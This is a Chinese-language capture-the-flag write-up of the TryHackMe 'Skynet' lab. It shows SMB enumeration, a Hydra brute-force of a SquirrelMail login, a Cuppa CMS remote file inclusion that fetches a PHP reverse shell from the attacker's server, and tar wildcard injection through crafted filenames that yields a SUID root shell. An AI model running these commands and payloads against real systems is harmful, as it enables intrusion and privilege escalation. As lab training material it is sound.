THM-Skynet-Writeup

通过学习相关知识点：攻破Linux目标机器并完成提权操作。

部署并渗透目标机器

step1

使用Nmap扫描端口

nmap -p- -sC -sV -T4 -v 10.10.164.81

139/445端口开放，可知目标机开启了SMB服务

枚举SMB共享

smbclient -L \\10.10.164.81

获取到一些可能能访问的SMB服务账号：anonymous、milesdyson

使用命令连接SMB服务中的匿名账户并获取所需文件

smbclient  // 10.10.164.81/anonymous

分析attention.txt文本内容：管理员通知员工及时修改密码修改，所以最近可能发生过密码更改行为，根据文本内容中的署名及SMB服务账户名称--管理员账户为milesdyson

我们还得到了一份密码记录，该密码记录中可能包含了目标站点的密码信息

使用gobuster扫描目录（针对目标站点）

gobuster dir -u http://10.10.164.81/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error

访问目标站点的二级目录/squirrelmail（10.10.164.81/squirrelmail）结果会自动跳转至/squirrelmail/src/login.php页面--这是一个邮件系统的登录页面

结合已知信息使用Hydra 爆破上图中的邮件服务器登录页面

hydra-l milesdyson -P log1.txt 10.10.164.81 http-form-post "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown User or password incorrect."

破解得到的结果：milesdyson cyborg007haloterminator

step2

登录邮件服务器并查看邮件信息

访问10.10.164.81/squirrelmail/src/login.php页面进行登录即可

由邮件信息可知，SMB账户milesdyson的新密码为：)s{A&2Z=F^n_E.B`

登录SMB账户

smbclient -U milesdyson //10.10.164.81/milesdyson

查看文本文件内容

获取到的有效信息：二级目录/45kra24zxs28v3yd

step3

针对隐藏二级目录进行目标扫描

gobuster dir -u http://10.10.164.81/45kra24zxs28v3yd/ -w /usr/share/wordlists/</span>dirbuster/directory-list-2.3-medium.txt --no-error

得到CMS后台管理的登录页面：http://10.10.164.81/45kra24zxs28v3yd/administrator/

CMS信息：Cuppa CMS

根据CMS信息查找exp

在https://www.exploit-db.com/上搜索关键字Cuppa以查找Cuppa CMS相关的漏洞exp

step4

构造payload以获取目标shell

继续查看相关exp的利用方法

我们可以构造如下的远程文件包含payload，在浏览器执行即可

http://$IP1/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$IP2/php-reverse-shell.php 

原理：利用相关CMS的远程文件包含漏洞，让目标页面远程包含--本地攻击机所开启的简易服务器上的反向shell文件，这样我们在浏览器中一旦输入上述payload 就能让目标页面弹一个shell到我们的本地攻击机。

我们首先要在本地机上建立并修改好一个可使用的反向shell文件（主要是修改shell文件内容中的ip信息和端口信息），然后我们再在本地机上开启一个简易的服务器以便目标服务器实现远程包含，我们还需要建立一个Netcat监听器以便接收来自目标服务器的shell。

完成上述操作后，我们在本地机的浏览器中针对目标页面 执行远程包含漏洞的相关payload即可

http://10.10.164.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.16.58:8000/php-reverse-shell.php

查看user flag

我们已经成功获取到目标shell，所以利用shell界面查看user flag即可

which python #验证目标机有无Python环境
python -c "import pty; pty.spawn('/bin/bash')" #利用Python环境将当前shell切换为一个更稳定的shell

user flag：7ce5c2109a40f958099283600a9ae807

https://img2023.cnblogs.com/blog/2857591/202302/2857591-20230210185222563-211659773.png

step5

进行提权操作

继续使用shell界面，进入backups目录并查看其中的文件内容

由上图可知以下信息：

backups目录下有一个backup.sh文件，其内容和作用是--切换目录至/var/www/html 并将该目录下的所有内容归档为backup.tgz压缩文件，该tgz文件保存在backups目录下；

通过查看/etc/crontab即定时任务可知--刚才描述的backups目录下的backup.sh文件是一个定时任务，该.sh脚本每分钟都会以root身份执行。

在查询 GTFOBins 网站后，我们发现通过tar命令可以利用一个名为–checkpoint的参数，该参数允许在每次归档 X 个文件时（X的默认值为10）显示“进度”消息， –checkpoint还可以与 –checkpoint-action 标志串联使用，–checkpoint-action标志允许在到达检查点（checkpoint）时以二进制或脚本的形式执行某些操作。

结合前述已知信息：由于backups目录下的backup.sh脚本中使用的通配符* 将对 /var/www/html 目录中的所有文件和文件夹执行归档命令，因此我们可以通过在/var/www/html下添加 –checkpoint=1 文件（启用检查点功能）和 –checkpoint-action=exec=xxx 文件（指定要执行的操作，检查点值为1，每归档一个文件都执行指定操作），那么当 tar 处理到以上文件时，相关的文件名将会被有效地视为tar命令的参数--从而执行某些操作。

在/var/www/html目录下创建一个BASH脚本，该脚本的执行结果将创建一个实质为bash副本的 SUID 二进制文件，我们将该脚本命名为newroot.sh：

echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > newroot.sh

继续在/var/www/html目录下执行命令创建以下两个文件，这两个文件的实际作用是以文件名作为 tar 命令行中的参数:

touch"/var/www/html/--checkpoint=1"
touch"/var/www/html/--checkpoint-action=exec=sh newroot.sh"

大约一分钟后，cron 计划作业（即backups目录下的backup.sh脚本）将会以root权限自动运行，从而能够成功创建一个SUID文件（/tmp/nroot），我们可以使用 -p 标志执行该SUID文件，这将允许以该文件的所有者身份（root）执行此二进制文件，进而可以根据此二进制文件的内容切换到root shell。

cd/tmp
ls
/tmp/nroot -p
whoami

查看root flag

通过刚才获得的root shell界面查找对应flag即可